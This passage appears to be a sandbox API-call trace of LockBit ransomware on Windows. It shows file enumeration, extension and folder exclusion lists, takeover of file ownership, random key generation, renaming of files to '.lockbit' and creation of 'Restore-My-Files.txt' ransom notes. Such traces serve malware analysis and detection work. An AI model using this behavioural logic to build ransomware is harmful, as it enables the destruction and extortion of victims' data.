hTemplateFile=0x0) returned 0xffffffff [0088.149] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f4b9306, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f4b9306, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff1c74f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1917, dwReserved0=0x0, dwReserved1=0x0, cFileName="whitemask1047.png", cAlternateFileName="")) returned 1 [0088.149] lstrcmpiW (lpString1=".", lpString2="whitemask1047.png") returned -1 [0088.149] lstrcmpiW (lpString1="..", lpString2="whitemask1047.png") returned -1 [0088.149] PathFindExtensionW (pszPath="whitemask1047.png") returned=".png" [0088.149] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0088.149] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0088.150] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0088.150] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0088.150] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0088.150] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0088.150] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0088.150] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0088.150] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0088.150] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0088.150] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0088.150] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0088.150] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0088.150] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0088.150] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0088.150] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0088.150] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0088.150] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0088.150] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0088.150] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0088.150] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0088.150] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0088.150] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0088.150] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0088.150] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.151] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0088.151] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0088.151] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0088.151] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0088.151] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0088.151] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0088.151] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0088.151] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0088.151] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0088.151] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0088.151] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0088.151] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0088.151] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0088.151] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0088.151] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0088.151] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0088.151] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0088.151] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.151] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0088.151] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0088.151] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0088.151] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0088.151] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="whitemask1047.png") returned -1 [0088.151] lstrcmpiW (lpString1="ntldr", lpString2="whitemask1047.png") returned -1 [0088.152] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="whitemask1047.png") returned -1 [0088.152] lstrcmpiW (lpString1="bootsect.bak", lpString2="whitemask1047.png") returned -1 [0088.152] lstrcmpiW (lpString1="autorun.inf", lpString2="whitemask1047.png") returned -1 [0088.152] lstrcmpiW (lpString1="thumbs.db", lpString2="whitemask1047.png") returned -1 [0088.152] lstrcmpiW (lpString1="iconcache.db", lpString2="whitemask1047.png") returned -1 [0088.152] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\") returned="" [0088.152] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png") returned=".png" [0088.152] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0088.152] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0088.152] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0088.152] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0088.152] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0088.152] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0088.152] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0088.152] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0088.152] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0088.152] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0088.152] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0088.152] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0088.152] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0088.152] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0088.152] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0088.152] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0088.153] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0088.153] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0088.153] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0088.153] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0088.153] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0088.153] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0088.153] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0088.153] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0088.153] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0088.153] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0088.153] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0088.153] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0088.153] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png.lockbit") returned 86 [0088.153] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\whitemask1047.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.154] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0088.154] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0088.154] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0088.154] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0088.155] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0088.155] RtlFreeAnsiString (AnsiString="\\") [0088.155] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0088.155] malloc (_Size=0x200) returned 0x77d800 [0088.155] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0088.155] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.155] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.155] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.156] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.156] CloseHandle (hObject=0x3a0) returned 1 [0088.156] free (_Block=0x77d800) [0088.156] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\whitemask1047.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0088.156] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0088.156] malloc (_Size=0x40068) returned 0x3d70048 [0088.156] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=6423) returned 1 [0088.156] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.157] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0088.157] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.158] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0088.158] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0088.181] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0088.181] malloc (_Size=0xc2) returned 0x1ff1e60 [0088.181] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc2, FileInformationClass=0xa) returned 0xc0000008 [0088.181] free (_Block=0x1ff1e60) [0088.181] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 1 [0088.181] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt") returned 81 [0088.181] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.182] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f46d04c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f46d04c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x296fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="whitevignette1047.png", cAlternateFileName="")) returned 1 [0088.182] lstrcmpiW (lpString1=".", lpString2="whitevignette1047.png") returned -1 [0088.182] lstrcmpiW (lpString1="..", lpString2="whitevignette1047.png") returned -1 [0088.182] PathFindExtensionW (pszPath="whitevignette1047.png") returned=".png" [0088.182] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0088.182] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0088.182] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0088.182] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0088.182] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0088.182] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0088.182] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0088.182] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0088.182] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0088.182] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0088.182] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0088.182] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0088.182] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0088.182] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0088.182] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0088.182] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0088.182] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0088.182] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0088.182] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0088.182] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0088.182] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0088.182] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0088.182] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0088.183] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0088.183] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.183] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0088.183] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0088.183] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0088.183] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0088.183] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0088.183] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0088.183] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0088.183] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0088.183] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0088.183] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0088.183] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0088.183] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0088.183] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0088.183] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0088.183] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0088.183] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0088.183] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0088.183] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.183] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0088.183] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0088.183] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0088.183] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0088.183] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="whitevignette1047.png") returned -1 [0088.183] lstrcmpiW (lpString1="ntldr", lpString2="whitevignette1047.png") returned -1 [0088.183] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="whitevignette1047.png") returned -1 [0088.183] lstrcmpiW (lpString1="bootsect.bak", lpString2="whitevignette1047.png") returned -1 [0088.184] lstrcmpiW (lpString1="autorun.inf", lpString2="whitevignette1047.png") returned -1 [0088.184] lstrcmpiW (lpString1="thumbs.db", lpString2="whitevignette1047.png") returned -1 [0088.184] lstrcmpiW (lpString1="iconcache.db", lpString2="whitevignette1047.png") returned -1 [0088.184] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\") returned="" [0088.184] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png") returned=".png" [0088.184] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0088.184] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0088.184] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0088.184] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0088.184] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0088.184] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0088.184] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0088.184] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0088.184] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0088.184] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0088.184] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0088.184] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0088.184] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0088.184] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0088.184] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0088.185] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0088.185] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0088.185] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0088.185] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0088.185] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0088.185] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0088.185] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0088.185] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0088.185] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0088.185] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0088.185] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0088.185] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0088.185] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0088.185] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png.lockbit") returned 90 [0088.185] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\whitevignette1047.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.186] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0088.186] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0088.186] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0088.186] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0088.187] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0088.187] RtlFreeAnsiString (AnsiString="\\") [0088.187] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0088.187] malloc (_Size=0x200) returned 0x77d800 [0088.187] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0088.187] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.187] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.187] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.188] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.188] CloseHandle (hObject=0x3a0) returned 1 [0088.188] free (_Block=0x77d800) [0088.188] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\whitevignette1047.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0088.188] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0088.188] malloc (_Size=0x40068) returned 0x1fb18c0 [0088.188] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=169722) returned 1 [0088.188] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.189] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0088.189] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.190] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0088.190] ReadFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0088.192] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0088.192] malloc (_Size=0xca) returned 0x1ff1e60 [0088.192] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xca, FileInformationClass=0xa) returned 0x0 [0088.192] free (_Block=0x1ff1e60) [0088.192] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 1 [0088.192] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt") returned 81 [0088.193] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.193] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f46d04c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f46d04c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x296fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="whitevignette1047.png", cAlternateFileName="")) returned 0 [0088.193] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0088.193] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fdc8b88, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa86cdff, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa0e2d73a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Sports", cAlternateFileName="")) returned 1 [0088.193] lstrcmpiW (lpString1=".", lpString2="Sports") returned -1 [0088.193] lstrcmpiW (lpString1="..", lpString2="Sports") returned -1 [0088.193] lstrcmpiW (lpString1="Sports", lpString2="$windows.~bt") returned 1 [0088.193] lstrcmpiW (lpString1="Sports", lpString2="intel") returned 1 [0088.193] lstrcmpiW (lpString1="Sports", lpString2="msocache") returned 1 [0088.193] lstrcmpiW (lpString1="Sports", lpString2="$recycle.bin") returned 1 [0088.193] lstrcmpiW (lpString1="Sports", lpString2="$windows.~ws") returned 1 [0088.193] lstrcmpiW 